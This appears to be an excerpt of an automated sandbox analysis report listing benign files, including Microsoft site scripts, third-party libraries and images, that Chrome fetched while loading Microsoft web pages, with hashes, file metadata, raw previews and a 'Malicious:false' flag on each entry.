                                                                                                                                    Preview:COMSCORE.SiteRecruit.Broker.config={sv:"scor",cddsDomains:"",cddsInProgress:"",domainSwitch:"",domainMatch:"",delay:0,cddsIntervalMax:10,crossDomainCheck:function(){1<this.cddsIntervalMax?(this.cddsIntervalMax--,!1!==COMSCORE.SiteRecruit.Utils.UserPersistence.getCookieValue(this.cddsInProgress)&&(setInterval(function(){COMSCORE.SiteRecruit.DDKeepAlive.setDDTrackerCookie()},1e3),COMSCORE.SiteRecruit._halt=!0,COMSCORE.SiteRecruit.Utils.UserPersistence.createCookie("srCDDS","1",{path:"/",domain:COMSCORE.SiteRecruit.Broker.config.cookie.domain,duration:"s"}),this.clearCrossDomainCheck())):this.clearCrossDomainCheck()},clearCrossDomainCheck:function(){window.clearInterval(crossDomainInterval)},isolateDomain:function(e){return e=(e=e.substring(e.indexOf("//")+2,e.length)).substring(0,e.indexOf("/"))},addEventDelay:1e3,isWindowOpener:!0,cookie:{name:"msresearch",path:"/",domain:".microsoft.com",duration:90},tracker:{ssl:"https://www.microsoft.com/library/svy/SiteRecruit_Tracker.htm"},mobile:{
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:JSON data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):72
                                                                                                                                    Entropy (8bit):4.241202481433726
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                    SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                    SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                    SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1600x582, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):86364
                                                                                                                                    Entropy (8bit):7.996703271043696
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:02814CE6DBF418D2E366F9B45F7FF838
                                                                                                                                    SHA1:99EDF52DB5A2BA39DE19CF7629AEB12A978717D4
                                                                                                                                    SHA-256:1A438340CCABF519B37D6BA58D27E8747F487F6B834E77C08E974ECDD61DC8C4
                                                                                                                                    SHA-512:7FBF7592C4469721358BADA342DC1D26B274C80E3BC6F6965886F9ADE37BD7BA3AEAA3DD0CB2BC618246C5F000F2EA72E4D462FA59D9F9F7B8EB4F93F965523A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFFTQ..WEBPVP8 HQ.......*@.F.>...A..ZA#..a,.....O.#2?..P.C..<......N.g............}.|..?..x..|.....h.=<......t?.............._...{..?......._.............G....._...?...|............'._.O................_...Oq?...?........../....L.......g........_.?4...................?.......4.(.G.................$._...?.z......?......_.?....<?.....?./._............w.....;e.......{.|9.....?s..|..'...............?..........'.....{..f.;...O./.................?.....9....._.o...........#.......O.!L.d.^6.....w.iT.....N.*..P..t..u.S.j....;...cm@P..'q.Lm...:..:....@.@..ZU1.......}.......".&=.E....|'.C...A..J..G....k.>.(.....J.6.....w.iT.....N.*..P..t..u.S.;...@....j.O.8.U.....^..8.......bj..c(..c-.W..!.#..y......P..t..u.9.$.!....@.@..ZU1..(.....J.6.....e..9..S.".Je..Q....!.........#".A...E....c.V...p^sv....r...(&..f..ips.5..0.).u.l.......J.G.3..qVd.qp..'q.Lm...:..:....@.@..ZGI7_Ug...,.5s...+..57f.....?.3..1...".n_->P.g&.0/.....A498k...P.I@C.&}.........].70.Y.,u.S.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (3336)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114817
                                                                                                                                    Entropy (8bit):5.471741062828651
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:49E8DA3C3AAD092907A3E8108ACA04E2
                                                                                                                                    SHA1:259A2DF1164F5C5ECCFA0308FCD6EEFB5C455920
                                                                                                                                    SHA-256:BFEEC3D640AD21E15B9D4F57331E1A009FE54B03140792FD5DC6206F4797030C
                                                                                                                                    SHA-512:D313D236BB895BF3774BD8DBF3C084EF5250F72CACEE74232BC2A2A3DF17D3279ADE1D2FE93CF933D08F760332C96F13873360A6E88328CA7CB820ECAB6AA8CB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:/*! 160368 */!function(e){let n="www.microsoft.com"!==window.location.hostname,i="https://go.microsoft.com/fwlink/p/?LinkID=",t={HERO:".highlight",ME_CONTROL_SIGN_IN:'#mectrl_main_trigger[href*="SignIn"]',SIGN_IN_LINK:'a[data-bi-bhvr="100"]',SIGN_UP_LINK:'a[data-bi-bhvr="210"]',UHF_SIGN_UP:"#c_shellmenu_signupforfree"},o,r=0,s;function a(){let e=document.querySelector(t.ME_CONTROL_SIGN_IN),i=document.querySelector(t.UHF_SIGN_UP);e||e&&i?(o.signIn&&e.setAttribute("href",o.signIn),o.signUp&&i.setAttribute("href",o.signUp),clearInterval(s),n&&console.log("UHF sign-in override loaded after "+r+" iterations.")):r>40&&(clearInterval(s),n&&console.log("UHF sign-in override skipped after "+r+" iterations.")),r++}function l(){(o=function o(){let r=document.querySelector(t.HERO),s,a;if(r){let l=r.querySelector(t.SIGN_IN_LINK),g=r.querySelector(t.SIGN_UP_LINK);l?s=l.getAttribute("href"):n&&console.log("No hero sign in link found."),g?a=g.getAttribute("href"):n&&console.log("No hero sign up link f
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (655)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):476900
                                                                                                                                    Entropy (8bit):5.5048390520226524
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:763C942B927FE0F5D20F673EAEA8CA64
                                                                                                                                    SHA1:1702988FC64DC26072BDCA99D237F9C8AEF5DC75
                                                                                                                                    SHA-256:0625AEA907B132E21DDA7CFE12C3AFFE07EAA45E9900CB5BDB602469F89C2E0D
                                                                                                                                    SHA-512:67A44963E43EADFA3BD6ECAAF8342F91ED0F803C28AFF204EE835F32F100D741755DC3793628CF0D087AD3241A6D6C4834E02B9AD92B6E7392CF8E2F73AA474D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine/main-light.min.ACSHASH763c942b927fe0f5d20f673eaea8ca64.js
                                                                                                                                    Preview:/*. OneCloud Reimagine v0.309.0. MWF (Moray) v2.8.1. Copyright (c) Microsoft Corporation. All rights reserved.. Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc..*/.'use strict';(function(V,L){"object"===typeof exports&&"undefined"!==typeof module?L(exports):"function"===typeof define&&define.amd?define(["exports"],L):(V="undefined"!==typeof globalThis?globalThis:V||self,L(V.ocrReimagine={}))})(this,function(V){function L(){function b(x,w,y){return Object.defineProperty(x,w,{value:y,enumerable:!0,configurable:!0,writable:!0}),x[w]}function d(x,w,y,R){w=Object.create((w&&w.prototype instanceof c?w:c).prototype);R=new r(R||[]);return A(w,"_invoke",{value:k(x,y,.R)}),w}function a(x,w,y){try{return{type:"normal",arg:x.call(w,y)}}catch(R){return{type:"throw",arg:R}}}function c(){}function e(){}function f(){}function g(x){["next","throw","return"].forEach(function(w){b(x,w,function(y){return this._invoke(w,y)})})}function h(x,w){function y(E,wa,ja,Lb){E=a(x[E],x,wa);if("throw"!==E.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (21562)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):21709
                                                                                                                                    Entropy (8bit):5.093484027812251
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:748BF69BD80B37D3F3CE4CF394C07BBC
                                                                                                                                    SHA1:8FD4B0F60D5873647FCFEF0B3CAB713B1C82C777
                                                                                                                                    SHA-256:87E716D8EBF6F291D6DE2CD576C5AA688B75B978F66B3A8257BA13CFEE07E29F
                                                                                                                                    SHA-512:3F97B286B3CD4840DE8E5CF36F2656873B792AD156E0564FB12D88EED4626435C54CAC1591C536A60AF2656FA49668BBD0BD37BC334BEF7C19DE3B99E4796CEA
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC82b2c8c298654e17859974fddee31855-source.min.js
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC82b2c8c298654e17859974fddee31855-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC82b2c8c298654e17859974fddee31855-source.min.js', "var ruleCorrelationGuid=\"KIF-9a6a4551-d7ca-492e-83b8-a679497175ba\";console.log(ruleCorrelationGuid+\": Launcher Rule Fired\"),window.oa=window.oa||{},window.oa.enrichments=window.oa.enrichments||[],window.oa.enrichments.skus_global={\"146517a0-188f-42c7-962c-c58974af30df\":{fwlink_id:[\"403805\"],wildcard:\"false\",impact_radius:\"yes\",offer_prod_full_name:\"exchange online (plan 1)\",offer_license_type:\"subscription\"},\"a8592538-ec4a-4e56-ae48-20d17998cd20\":{fwlink_id:[\"403806\"],wildcard:\"false\",impact_radius:\"yes\",offer_prod_full_name:\"exchange online (plan 2)\",offer_license_type:\"subscription\"},\"28504f49-3a7d-4f0f-8cfb-0febc4092c0a\":{fwlink_id:[\"403828\"],wildcard:\"false\",
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (505)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1418
                                                                                                                                    Entropy (8bit):5.418786110345074
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:20AAFDF6904D3DC5DB0E0E33ABBFC1A4
                                                                                                                                    SHA1:CC1A639FF69FE0D8A8F1EFEE7FCB04941E7B57C8
                                                                                                                                    SHA-256:EE4E620F350907CE3867454B2BD45984BE949EB46B113183D4B8B403032DA14D
                                                                                                                                    SHA-512:91B0BD81FCD2D3D040D9FC1DB74F5CA916EF88E7887D2868530BF1319EAF5462CC54421AB80FC97B258B569B9AF40F2B9FD1B6D417C9A4561BBA22EDF785D905
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:/*. jQuery Cookie Plugin v1.4.1. https://github.com/carhartl/jquery-cookie.. Copyright 2013 Klaus Hartl. Released under the MIT license.*/.'use strict';(function(d){"function"===typeof define&&define.amd?define(["jquery"],d):"object"===typeof exports?d(require("jquery")):d(jQuery)})(function(d){function l(a,c){if(e.raw)var b=a;else a:{0===a.indexOf('"')&&(a=a.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{a=decodeURIComponent(a.replace(m," "));b=e.json?JSON.parse(a):a;break a}catch(h){}b=void 0}return d.isFunction(c)?c(b):b}var m=/\+/g,e=d.cookie=function(a,c,b){if(void 0!==c&&!d.isFunction(c)){b=d.extend({},e.defaults,b);.if("number"===typeof b.expires){var h=b.expires,g=b.expires=new Date;g.setTime(+g+864E5*h)}a=e.raw?a:encodeURIComponent(a);c=e.json?JSON.stringify(c):String(c);c=e.raw?c:encodeURIComponent(c);return document.cookie=[a,"\x3d",c,b.expires?"; expires\x3d"+b.expires.toUTCString():"",b.path?"; path\x3d"+b.path:"",b.domain?"; domain\x3d"+b.domain:"",b.secure?";
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1501
                                                                                                                                    Entropy (8bit):7.518946990214807
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:F96519F4A34C594F5ABF3CD4415A6AB2
                                                                                                                                    SHA1:E0909EB808CCA1B009CC4002A32DF5A7BE618B79
                                                                                                                                    SHA-256:9BE8E19E5A219F361AE85D42464EA3D19B68BB01A0C266A46882B9B6682EB5F3
                                                                                                                                    SHA-512:DEBF66570BA714B31A234D058440833F0C9BE91D7896D3DB9D91DFC5C1875A0ADADB03DAC912D34DCBB260F7EE5867978558D1E2FD5710ED8DDF19236CDB2EDD
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_YT?scl=1
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat.......?.@CA.2........b..9.I.Xn.....&..)bh.8..{(..5...t6.*.SD.J..$....K0[o....cK..|^C.K.-&..X.b4.5....G.8.D.."e...U.._..Z.j.v.../..}h.9.S.V.=....?.?.!.}.s2l.+.b.4J..?.........~E..O...%.G...F.s. ..`.....hY....Xr./.`..u,K.....m"..L..6N...x...$.BE.zGR..F.i7.a..]qKt....`....l.`..f?_P.%$.G...[oMs....I..Q<.A...a-......i...E.2.lh...:;.h.=...*S....6%...qgx..,..'.#5{"..z.V]^(....'...:./K*$.4.*.-..w.$j.q...Z.X..&.<..c.z.F?.*8...y.../.N.Z.km4..B....n.\.._..e.a+A. ..[uT..]W.*io...di-."o....(..../....o........94#.$.%..R.OW.e9...S.....W....P.4..D.......~i.6....^.......BK..m.\......~UL....X.wK....L%....).8a.....&.H!*S.p4...c..l..)..[.r.[..H....w.m*.rX..a..(X.i.....F...<....8Q.d.,0.....].8.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):61
                                                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (7794), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):7794
                                                                                                                                    Entropy (8bit):5.350716681959343
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:A5A510020CA1FD908E6ED09D25998FAB
                                                                                                                                    SHA1:214FCE1D3C10D68E3EC4701063E70F35FD582F98
                                                                                                                                    SHA-256:7FCBC5D3C3265E7038E929C1CFF2495764DD435C770852863EB46B9791C49524
                                                                                                                                    SHA-512:2E58053C2EE3192EB165B18F9ABFBD0C9D024707E0C2394FDFD8B49B543B55A0D2DC90A7FFAE43D3B7FDFB48AB604E05AB2F882F6937327F7D1BB2300D794BC3
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:window.lpTag=window.lpTag||{};lpTag.taglets=lpTag.taglets||{};lpTag.taglets.SurveyLogic=lpTag.taglets.SurveyLogic||function(e){if(!e.survey||"object"!=typeof e.survey||this===window)return!1;this.survey=e.survey.survey||e.survey;this.createQuestionsMap();this.defaultSelectValue=e.defaultSelectValue||"";this.header=this.survey.header||""};!function(e){var t="prototype";e[t].questionTypes={TEXTF:"Text Field",TEXT:"Text Area",SELECT:"Dropdown Box",RADIO:"Radio Button",RADIOH:"Radio Button (side by side)",CHECKBOX:"Checkbox",CSAT:"CSAT"};e[t].validationTypes={EMAIL:"email",NUMBER:"numeric",STRING:"alpha_numeric",CSAT:"csat",PHONE:"phoneNumber"};e[t].errorTypes={EMAIL:"email",NUMBER:"numeric",ILLEGAL_CHARS:"illegal_chars",REQUIRED:"required",CSAT_RANGE:"csat_range",LENGTH:"length",PHONE:"phoneNumber"};e[t].questionsText={MAX_LENGTH:2e3};e[t].csatRange={lowest:0,highest:5};e[t].getAllQuestions=function(){return this.survey&&this.survey.questions&&this.survey.questions.question&&this.survey.q
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):4565
                                                                                                                                    Entropy (8bit):7.879534543139402
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                                                    SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                                                    SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                                                    SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/UHFbanner-MSlogo?fmt=png-alpha&bfc=off&qlt=100,1"
                                                                                                                                    Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65302)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):304858
                                                                                                                                    Entropy (8bit):5.098842090973851
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:561C834597FB9BC5AAC4021E21E006BE
                                                                                                                                    SHA1:C535802C0C6171B4BE1A776034C330418B36983D
                                                                                                                                    SHA-256:D8BAB22B1506E8444C64D92431F521964F658C380F5D32738AFEA85C15F03013
                                                                                                                                    SHA-512:748BFA3F917C8E75699A52FFE0AB2F753262D1B73810ACF68523930B665EF10A85329BD63A2A7B39746154554EA7A195270D1326C98C77DE72F75E4EB14CBB2F
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH561c834597fb9bc5aac4021e21e006be.css
                                                                                                                                    Preview:@charset "UTF-8";/*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */@font-face{font-family:MWF-FLUENT-ICONS;src:url(resources/fonts/MWFFluentIcons.woff2) format("woff2"),url(resources/fonts/MWFFluentIcons.woff) format("woff"),url(resources/fonts/MWFFluentIcons.ttf) format("truetype")}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf) format("ttf");font-weight:400}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-euro
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1112334
                                                                                                                                    Entropy (8bit):5.629353115806243
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:5F9CB2240AEC370DCF4B38BC018B4A2C
                                                                                                                                    SHA1:FCA9EC94FB3095651CC5EB9138FC26691EF4BF31
                                                                                                                                    SHA-256:E461D7DB8B2E5F1134CF65A81CB67266012EFCA717F4A345FF82D565308B780C
                                                                                                                                    SHA-512:A81D5CFAACA8B3FF2D80FC47ADE9F4EB441D3154B5D965CCA71EA071B20C779F7DCA9DB3720E939223F091E9086851C936E34430AD71F347606CDA204737A364
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:!function(){"use strict";var e={937:function(e,t){function r(e){return btoa(e).replace(/\+/g,"-").replace(/\//g,"_").replace(/=+$/,"")}function n(e,t,n){e(null,{verifier:t,challenge:r(String.fromCharCode.apply(null,new Uint8Array(n)))})}t.A=function(e,t){e||(e=43);for(var i=window.msCrypto||window.crypto,o=r(Array.prototype.map.call(i.getRandomValues(new Uint8Array(e)),(function(e){return String.fromCharCode(e)})).join("")).substring(0,e),a=new Uint8Array(o.length),c=0;c<o.length;c++)a[c]=o.charCodeAt(c);var u=i.subtle.digest("SHA-256",a);window.CryptoOperation?(u.onerror=t,u.oncomplete=function(e){n(t,o,e.target.result)}):u.then((function(e){n(t,o,e)})).catch(t)}}},t={};function r(n){var i=t[n];if(void 0!==i)return i.exports;var o=t[n]={exports:{}};return e[n](o,o.exports,r),o.exports}!function(){var e=crypto,t=function(e){return e instanceof CryptoKey};function n(e,t,r,n,i,o,a){try{var c=e[o](a),u=c.value}catch(e){return void r(e)}c.done?t(u):Promise.resolve(u).then(n,i)}var i=functi
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2998x1689, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):292108
                                                                                                                                    Entropy (8bit):7.996596322752429
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:746B4C56476D10A8C5AA795997100182
                                                                                                                                    SHA1:6C84D5FB10D7DE84D4CF8B37FFE6872D73FE8979
                                                                                                                                    SHA-256:0914443388BF44F2BAA34A803EF58E486D5A5BD7777D610C914072F533963A33
                                                                                                                                    SHA-512:E7F079EC306AF4744B5D1034D57BAF0371F4C77064D343E37C8D139BD9E67CB45DED1FACA203C5F423AB6A88013F87009ACA4DA43968D25D4C1B3EC377D3370D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF.u..WEBPVP8 .t......*....>...B!.B....a,........,.z.#.@k..[..gm.n..~.r..S.?..zOWB..?7......c.o.....w.7...{D...?........w..?..|.'.O.....>.s..?.....}.......1.............}....K.o.....?................?.?....A.......?......+.............q...g.....?....9.........o._.....~....'.............?.?.~.~.~............[...........@...5.o...........G...?........5.......?...........?.......?........w././...........g......_..._.............S.j...y..._..........G..n....._....Y..................G.......Q.......?D.....o..?..`.....O..._.....O.......A.O.?..._.~....7.../...?.......................G.....3./....f...G.......>t>..'...?....W.7.....|./.G.W.....?..._...'.......~..?._.G......................_.?..r...3.G.........._.+........|..........?............_.....................C.p.....q........._._....z f0....c.a.1.0....c.a.1.0....c.a.1.0....c.a.1.0....c.a.1.0....c.a.1.0....c.a.1.0....o.&V.tuc....k=F9O..F\..B5.3.c.a.1.0....c.a.1.0....c.a.1.0....c.a.1.0....c.a.1.0....c.1..'
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):159
                                                                                                                                    Entropy (8bit):4.661188988961239
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:C22EA5B46F3FCAD90DA0ABCC0A3F73D4
                                                                                                                                    SHA1:2DB789C63AFB63D98932D7B55907DC3508E318B4
                                                                                                                                    SHA-256:8334DAA260516BB896407461E5F10E8E3041B06C56846BBB9D3435C6E77513AD
                                                                                                                                    SHA-512:A0359F8C25DC40CEFFD14A41BA81794717B99DABE78CBF8A8678F3E3EC57F317388CA0DC55B1CC6AD2D6C13D2B3CAEB5A64527BB2C646ED2D93775437DA646F1
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:'use strict';function isFeatureEnabled(b){var a=document.getElementById("customFeatureControl").getAttribute("enabledFeatures");return null!=a&&a.includes(b)};
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65471)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):4004963
                                                                                                                                    Entropy (8bit):5.608526137357891
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:B43015D52D9B94E96ED0014BEEC60073
                                                                                                                                    SHA1:4FF02D873DE449E83D0BD2E8CA0AEE0CCCEC2A5C
                                                                                                                                    SHA-256:74F25E06CA7E129830D80CE20633807EE402C2163B758A9642A1845C59CADB14
                                                                                                                                    SHA-512:CEEDE0683CCAEC41D0C203EAE939331F82C0265ACBCFB218476183423EA207BA3C06A1E49FE7D91D6CB1F860801D899255A3BAC3DF340A5B1F3A35B09B97D322
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://cdn.botframework.com/botframework-webchat/latest/webchat.js
                                                                                                                                    Preview:/*! For license information please see webchat.js.LICENSE.txt */.!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var r=t();for(var n in r)("object"==typeof exports?exports:e)[n]=r[n]}}(self,(function(){return function(){var e,t,r={37825:function(e,t,r){"use strict";var n=r(92412),i={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},o={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},a={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},s={};function c(e){return n.isMemo(e)?a:s[e.$$typeof]||i}s[n.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},s[n.Memo]=a;var u=Object.defineProperty,l=Object.getOwnPropertyNames,p=Object.getOwnPropertySymbols,d=Object.getOwnPropertyDes
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 129x128, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):864
                                                                                                                                    Entropy (8bit):7.703439919110448
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:DF0D9667FE8D6C899DF6866EB045CCF7
                                                                                                                                    SHA1:BE3F851E3A213FC441F66922A6F162287ACE027C
                                                                                                                                    SHA-256:22856B6F06BCA03A7424851AF345E6ECE34CB8B5BAD703C525A968164D686F92
                                                                                                                                    SHA-512:9958AAFC06DAC5961A57323246B37AC907BF1753EB2445C0761E6A1A57A0C1775BDDB33582E3D1C7E886945A4597CAA88F9D92FDC48E30EA15D4AC027C6B68CA
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
